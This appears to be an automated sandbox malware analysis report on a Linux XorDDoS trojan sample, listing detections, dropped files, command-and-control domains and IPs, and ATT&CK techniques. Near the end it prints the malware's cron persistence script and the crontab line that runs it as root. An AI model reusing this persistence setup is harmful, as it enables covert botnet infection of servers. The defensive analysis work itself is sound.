                    Source: Yara matchFile source: 4757.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5188.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4933.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4889.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4790.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4724.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4834.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4944.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4556.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4878.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4922.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5287.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5122.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4735.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4900.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4677.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4977.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4911.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4699.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4746.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4578.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4713.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4966.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5199.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5221.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5485.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4801.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5133.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4688.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4655.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4823.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5111.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5507.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4955.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5177.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5155.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4779.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 4ljhdTTyiA PID: 5054, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 4ljhdTTyiA PID: 5507, type: MEMORY
                    Source: Yara matchFile source: /usr/bin/nyavevzqtw, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/uoewtvxqdd, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/dxeguomyxc, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/jjltawydwf, type: DROPPED
                    Source: Yara matchFile source: /lib/libudev.so, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/ctrygxclrx, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/rlyjyybyum, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/tjdqviitkh, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/fcxqfstrdm, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/aspbnnkmso, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/ouhdchrbdz, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/lgnmbyzzlq, type: DROPPED
                    Source: Yara matchFile source: /usr/bin/gqczobuacc, type: DROPPED

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsScripting1Systemd Service1Systemd Service1Masquerading11OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/Job1Scheduled Task/Job1Scheduled Task/Job1Scripting1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)2At (Linux)2At (Linux)2File Deletion1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

                    Malware Configuration

                    No configs have been found

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Number of created Files
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 450972 Sample: 4ljhdTTyiA Startdate: 20/07/2021 Architecture: LINUX Score: 100 77 aaa.dsaj2a.org 23.253.46.64, 50586, 80 RACKSPACEUS United States 2->77 79 ww.gzcfr5axf6.com 2->79 81 2 other IPs or domains 2->81 83 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for dropped file 2->87 89 6 other signatures 2->89 10 4ljhdTTyiA 2->10         started        signatures3 process4 process5 12 4ljhdTTyiA 10->12         started        file6 69 /usr/bin/uoewtvxqdd, ELF 12->69 dropped 71 /usr/bin/tjdqviitkh, ELF 12->71 dropped 73 /usr/bin/rlyjyybyum, ELF 12->73 dropped 75 12 other malicious files 12->75 dropped 101 Drops files in suspicious directories 12->101 103 Sample deletes itself 12->103 105 Sample tries to persist itself using cron 12->105 107 Sample tries to persist itself using System V runlevels 12->107 16 4ljhdTTyiA 12->16         started        18 4ljhdTTyiA dash 12->18         started        22 4ljhdTTyiA 12->22         started        24 150 other processes 12->24 signatures7 process8 file9 26 4ljhdTTyiA update-rc.d 16->26         started        61 /etc/crontab, ASCII 18->61 dropped 91 Sample tries to persist itself using cron 18->91 28 dash sed 18->28         started        31 4ljhdTTyiA jjltawydwf 22->31         started        33 4ljhdTTyiA jjltawydwf 24->33         started        35 4ljhdTTyiA jjltawydwf 24->35         started        37 4ljhdTTyiA jjltawydwf 24->37         started        39 147 other processes 24->39 signatures10 process11 signatures12 41 update-rc.d insserv 26->41         started        45 update-rc.d systemctl 26->45         started        99 Sample tries to persist itself using cron 28->99 47 jjltawydwf 31->47         started        49 jjltawydwf 33->49         started        51 jjltawydwf 35->51         started        53 jjltawydwf 37->53         started        55 jjltawydwf 39->55         started        57 ouhdchrbdz 39->57         started        59 144 other processes 39->59 process13 file14 63 /etc/init.d/.depend.stop, ASCII 41->63 dropped 65 /etc/init.d/.depend.start, ASCII 41->65 dropped 67 /etc/init.d/.depend.boot, ASCII 41->67 dropped 93 Drops files in suspicious directories 41->93 95 Sample tries to persist itself using System V runlevels 41->95 97 Sample deletes itself 47->97 signatures15

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    4ljhdTTyiA66%VirustotalBrowse
                    4ljhdTTyiA65%MetadefenderBrowse
                    4ljhdTTyiA72%ReversingLabsLinux.Trojan.XorDDoS
                    4ljhdTTyiA100%AviraLINUX/Xorddos.cona
                    4ljhdTTyiA100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    /usr/bin/gqczobuacc100%AviraLINUX/Xorddos.cona
                    /usr/bin/jjltawydwf100%AviraLINUX/Xorddos.cona
                    /usr/bin/rlyjyybyum100%AviraLINUX/Xorddos.cona
                    /usr/bin/ouhdchrbdz100%AviraLINUX/Xorddos.cona
                    /usr/bin/tjdqviitkh100%AviraLINUX/Xorddos.cona
                    /usr/bin/nyavevzqtw100%AviraLINUX/Xorddos.cona
                    /lib/libudev.so100%AviraLINUX/Xorddos.cona
                    /usr/bin/ctrygxclrx100%AviraLINUX/Xorddos.cona
                    /usr/bin/aspbnnkmso100%AviraLINUX/Xorddos.cona
                    /usr/bin/fcxqfstrdm100%AviraLINUX/Xorddos.cona
                    /usr/bin/uoewtvxqdd100%AviraLINUX/Xorddos.cona
                    /usr/bin/dxeguomyxc100%AviraLINUX/Xorddos.cona
                    /usr/bin/lgnmbyzzlq100%AviraLINUX/Xorddos.cona
                    /usr/bin/gqczobuacc100%Joe Sandbox ML
                    /usr/bin/jjltawydwf100%Joe Sandbox ML
                    /usr/bin/rlyjyybyum100%Joe Sandbox ML
                    /usr/bin/ouhdchrbdz100%Joe Sandbox ML
                    /usr/bin/tjdqviitkh100%Joe Sandbox ML
                    /usr/bin/nyavevzqtw100%Joe Sandbox ML
                    /lib/libudev.so100%Joe Sandbox ML
                    /usr/bin/ctrygxclrx100%Joe Sandbox ML
                    /usr/bin/aspbnnkmso100%Joe Sandbox ML
                    /usr/bin/fcxqfstrdm100%Joe Sandbox ML
                    /usr/bin/uoewtvxqdd100%Joe Sandbox ML
                    /usr/bin/dxeguomyxc100%Joe Sandbox ML
                    /usr/bin/lgnmbyzzlq100%Joe Sandbox ML
                    /etc/cron.hourly/gcc.sh0%MetadefenderBrowse
                    /etc/cron.hourly/gcc.sh28%ReversingLabsLinux.Trojan.XorDDoS
                    /lib/libudev.so65%MetadefenderBrowse
                    /lib/libudev.so72%ReversingLabsLinux.Trojan.XorDDoS

                    Domains

                    SourceDetectionScannerLabelLink
                    aaa.dsaj2a.org4%VirustotalBrowse
                    ww.dnstells.com8%VirustotalBrowse
                    ww.gzcfr5axf6.com5%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://aaa.dsaj2a.org/config.rar7.com:530%Avira URL Cloudsafe
                    http://aaa.dsaj2a.org/config.rar0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    aaa.dsaj2a.org
                    23.253.46.64
                    truetrueunknown
                    ww.dnstells.com
                    204.11.56.48
                    truetrueunknown
                    ww.gzcfr5axf6.com
                    104.161.25.33
                    truetrueunknown
                    ww.gzcfr5axf7.com
                    unknown
                    unknownfalse
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://aaa.dsaj2a.org/config.rartrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.gnu.org/software/libc/bugs.html4ljhdTTyiA, 4551.1.0000000008048000.00000000080cf000.r-x.sdmpfalse
                        high
                        http://aaa.dsaj2a.org/config.rar7.com:534ljhdTTyiA, 4551.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4555.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4655.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4713.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4768.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4823.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4878.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4933.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4988.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5043.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5100.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5155.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5210.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5265.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5320.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5375.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5430.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5485.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5540.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        23.253.46.64
                        aaa.dsaj2a.orgUnited States
                        19994RACKSPACEUStrue


                        Runtime Messages

                        Command:/tmp/4ljhdTTyiA
                        Exit Code:0
                        Exit Code Info:
                        Killed:False
                        Standard Output:

                        Standard Error:

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        23.253.46.64executable.2772.exeGet hashmaliciousBrowse
                          executable.2772.exeGet hashmaliciousBrowse
                            executable.2772.exeGet hashmaliciousBrowse
                              executable.2772.exeGet hashmaliciousBrowse
                                executable.2772.exeGet hashmaliciousBrowse
                                  executable.2772.exeGet hashmaliciousBrowse
                                    resume.pdf.exeGet hashmaliciousBrowse
                                      resume.pdf.exeGet hashmaliciousBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        aaa.dsaj2a.orgqrfzdxxdxoGet hashmaliciousBrowse
                                        • 91.195.240.94
                                        npobbdmwlyGet hashmaliciousBrowse
                                        • 91.195.240.94
                                        ehttqpxezuGet hashmaliciousBrowse
                                        • 91.195.240.94
                                        libudev.soGet hashmaliciousBrowse
                                        • 91.195.240.94
                                        ww.dnstells.comisu80Get hashmaliciousBrowse
                                        • 91.195.240.82
                                        npobbdmwlyGet hashmaliciousBrowse
                                        • 91.195.240.82
                                        ehttqpxezuGet hashmaliciousBrowse
                                        • 91.195.240.82
                                        libudev.soGet hashmaliciousBrowse
                                        • 91.195.240.82
                                        Trojan.Linux.XorDDoS.2Get hashmaliciousBrowse
                                        • 91.195.240.82
                                        xorddos.soGet hashmaliciousBrowse
                                        • 91.195.240.82
                                        BeEhKJSCAn.virus_totalGet hashmaliciousBrowse
                                        • 91.195.240.82
                                        NTuTxYhnj0Get hashmaliciousBrowse
                                        • 91.195.240.82
                                        625900Get hashmaliciousBrowse
                                        • 91.195.240.82
                                        mxojabktnsGet hashmaliciousBrowse
                                        • 91.195.240.82
                                        libudev.soGet hashmaliciousBrowse
                                        • 91.195.240.82
                                        ww.gzcfr5axf6.comisu80Get hashmaliciousBrowse
                                        • 104.161.88.181
                                        qrfzdxxdxoGet hashmaliciousBrowse
                                        • 172.82.191.243
                                        npobbdmwlyGet hashmaliciousBrowse
                                        • 172.82.191.243
                                        ehttqpxezuGet hashmaliciousBrowse
                                        • 172.82.191.243
                                        libudev.soGet hashmaliciousBrowse
                                        • 172.82.191.243
                                        Trojan.Linux.XorDDoS.2Get hashmaliciousBrowse
                                        • 104.129.35.183
                                        xorddos.soGet hashmaliciousBrowse
                                        • 104.129.35.183
                                        BeEhKJSCAn.virus_totalGet hashmaliciousBrowse
                                        • 104.129.35.183
                                        NTuTxYhnj0Get hashmaliciousBrowse
                                        • 104.129.60.236
                                        625900Get hashmaliciousBrowse
                                        • 104.161.71.232
                                        mxojabktnsGet hashmaliciousBrowse
                                        • 104.161.71.232
                                        libudev.soGet hashmaliciousBrowse
                                        • 157.52.151.121

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        RACKSPACEUSCourt_Notice_Copy_May_5_2014.exeGet hashmaliciousBrowse
                                        • 173.203.113.94
                                        Owen.exeGet hashmaliciousBrowse
                                        • 108.166.10.6
                                        7#U1d05.htmlGet hashmaliciousBrowse
                                        • 146.20.128.126
                                        IMG_20210526_SWIFTOREPORT_JPG.exeGet hashmaliciousBrowse
                                        • 146.20.161.10
                                        0g3QvGXMBv.exeGet hashmaliciousBrowse
                                        • 146.20.161.10
                                        INV_6682738993_IMG.exeGet hashmaliciousBrowse
                                        • 166.78.79.129
                                        focus.exeGet hashmaliciousBrowse
                                        • 161.47.48.3
                                        executable.2772.exeGet hashmaliciousBrowse
                                        • 23.253.46.64
                                        SwiftReport_11371201183146224.exeGet hashmaliciousBrowse
                                        • 184.106.54.10
                                        IMG_INVOICE_6628862572.exeGet hashmaliciousBrowse
                                        • 173.203.187.10
                                        PI.exeGet hashmaliciousBrowse
                                        • 173.203.187.10
                                        swift copy.exeGet hashmaliciousBrowse
                                        • 173.203.187.10
                                        product specification.xlsxGet hashmaliciousBrowse
                                        • 162.209.114.201
                                        Proforma HBK Equip Req ozen-global 20.04.2021 cc (1).xlsx.exeGet hashmaliciousBrowse
                                        • 146.20.161.10
                                        INVOICE N. 7.pdf.exeGet hashmaliciousBrowse
                                        • 184.106.54.10
                                        WaybillDoc_5736357561.pdf.exeGet hashmaliciousBrowse
                                        • 184.106.54.10
                                        VWR CI 160421.xlsx.exeGet hashmaliciousBrowse
                                        • 173.203.187.10
                                        NdBLyH2h5d.exeGet hashmaliciousBrowse
                                        • 162.209.114.201
                                        RFQ12-ADM2020pdf.exeGet hashmaliciousBrowse
                                        • 23.253.11.194
                                        f1uK8cmWpt.dllGet hashmaliciousBrowse
                                        • 209.20.87.138

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        /etc/cron.hourly/gcc.sh7nJAEBDitlGet hashmaliciousBrowse
                                          ygljglkjgfg0Get hashmaliciousBrowse
                                            bVexvNSHcDGet hashmaliciousBrowse
                                              rJabrNEtBMGet hashmaliciousBrowse
                                                c1152b89-b68a-49af-af67-fd4b61683a72Get hashmaliciousBrowse
                                                  w.txtGet hashmaliciousBrowse
                                                    w.txtGet hashmaliciousBrowse
                                                      1433.binGet hashmaliciousBrowse
                                                        isu80Get hashmaliciousBrowse
                                                          java8000Get hashmaliciousBrowse
                                                            libudev.soGet hashmaliciousBrowse
                                                              qrfzdxxdxoGet hashmaliciousBrowse
                                                                npobbdmwlyGet hashmaliciousBrowse
                                                                  ehttqpxezuGet hashmaliciousBrowse
                                                                    libudev.soGet hashmaliciousBrowse
                                                                      Trojan.Linux.XorDDoS.2Get hashmaliciousBrowse
                                                                        xorddos.soGet hashmaliciousBrowse
                                                                          BeEhKJSCAn.virus_totalGet hashmaliciousBrowse
                                                                            bin.datGet hashmaliciousBrowse
                                                                              g3308lGet hashmaliciousBrowse

                                                                                Created / dropped Files

                                                                                /etc/cron.hourly/gcc.sh
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                Category:dropped
                                                                                Size (bytes):228
                                                                                Entropy (8bit):4.807897441464882
                                                                                Encrypted:false
                                                                                SSDEEP:3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
                                                                                MD5:3BAB747CEDC5F0EBE86AAA7F982470CD
                                                                                SHA1:3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
                                                                                SHA-256:74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
                                                                                SHA-512:21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                Joe Sandbox View:
                                                                                • Filename: 7nJAEBDitl, Detection: malicious, Browse
                                                                                • Filename: ygljglkjgfg0, Detection: malicious, Browse
                                                                                • Filename: bVexvNSHcD, Detection: malicious, Browse
                                                                                • Filename: rJabrNEtBM, Detection: malicious, Browse
                                                                                • Filename: c1152b89-b68a-49af-af67-fd4b61683a72, Detection: malicious, Browse
                                                                                • Filename: w.txt, Detection: malicious, Browse
                                                                                • Filename: w.txt, Detection: malicious, Browse
                                                                                • Filename: 1433.bin, Detection: malicious, Browse
                                                                                • Filename: isu80, Detection: malicious, Browse
                                                                                • Filename: java8000, Detection: malicious, Browse
                                                                                • Filename: libudev.so, Detection: malicious, Browse
                                                                                • Filename: qrfzdxxdxo, Detection: malicious, Browse
                                                                                • Filename: npobbdmwly, Detection: malicious, Browse
                                                                                • Filename: ehttqpxezu, Detection: malicious, Browse
                                                                                • Filename: libudev.so, Detection: malicious, Browse
                                                                                • Filename: Trojan.Linux.XorDDoS.2, Detection: malicious, Browse
                                                                                • Filename: xorddos.so, Detection: malicious, Browse
                                                                                • Filename: BeEhKJSCAn.virus_total, Detection: malicious, Browse
                                                                                • Filename: bin.dat, Detection: malicious, Browse
                                                                                • Filename: g3308l, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: #!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                                                /etc/crontab
                                                                                Process:/bin/dash
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):41
                                                                                Entropy (8bit):3.8484226636198593
                                                                                Encrypted:false
                                                                                SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                                                MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                                                SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                                                SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                                                SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                                                Malicious:true
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: */3 * * * * root /etc/cron.hourly/gcc.sh.
                                                                                /etc/init.d/.depend.boot
                                                                                Process:/usr/lib/insserv/insserv
                                                                                File Type:ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):1380
                                                                                Entropy (8bit):4.6286085863457025
                                                                                Encrypted:false
                                                                                SSDEEP:24:KcR684NIwOkJVARL9Eg3U3PX2xRmbUtOeAyh1ZFDSYpY3dOUwZlY:VR6843OkjARLq0U3PX2xYwtOQh1vDTp8
                                                                                MD5:5B62F52693F19BAD0D1373AB955F17B8
                                                                                SHA1:3865ED303BD83951D0D69D87A6290F120A937C2E
                                                                                SHA-256:9026F82085CF03BE408767439E4FD595F266FE6F11ECC4A3AF7F0555ED358196
                                                                                SHA-512:E0015AA580EAAFFF64D59F666FDC91280AAC50C10D5189A13B376E3C9DC71A0FE019D7EE05351F1136F65F5F1CAE6C58D781CBA2E073D57E323629BF5137BE25
                                                                                Malicious:true
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh.INTERACTIVE = console-setup udev keyboard-setup cryptdisks cryptdisks-early checkroot.sh checkfs.sh.udev: mountkernfs.sh.keyboard-setup: mountkernfs.sh udev.mountdevsubfs.sh: mountkernfs.sh udev.brltty: mountkernfs.sh udev.procps: mountkernfs.sh udev.qemu-kvm: mountkernfs.sh udev.cryptdisks: checkroot.sh cryptdisks-early udev lvm2.cryptdisks-early: checkroot.sh udev.hwclock.sh: mountdevsubfs.sh.open-iscsi: networking iscsid.networking: resolvconf mountkernfs.sh urandom procps.iscsid: networking.checkroot.sh: hwclock.sh mountdevsubfs.sh hostname.sh keyboard-setup.lvm2: cryptdi
                                                                                /etc/init.d/.depend.start
                                                                                Process:/usr/lib/insserv/insserv
                                                                                File Type:ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):1771
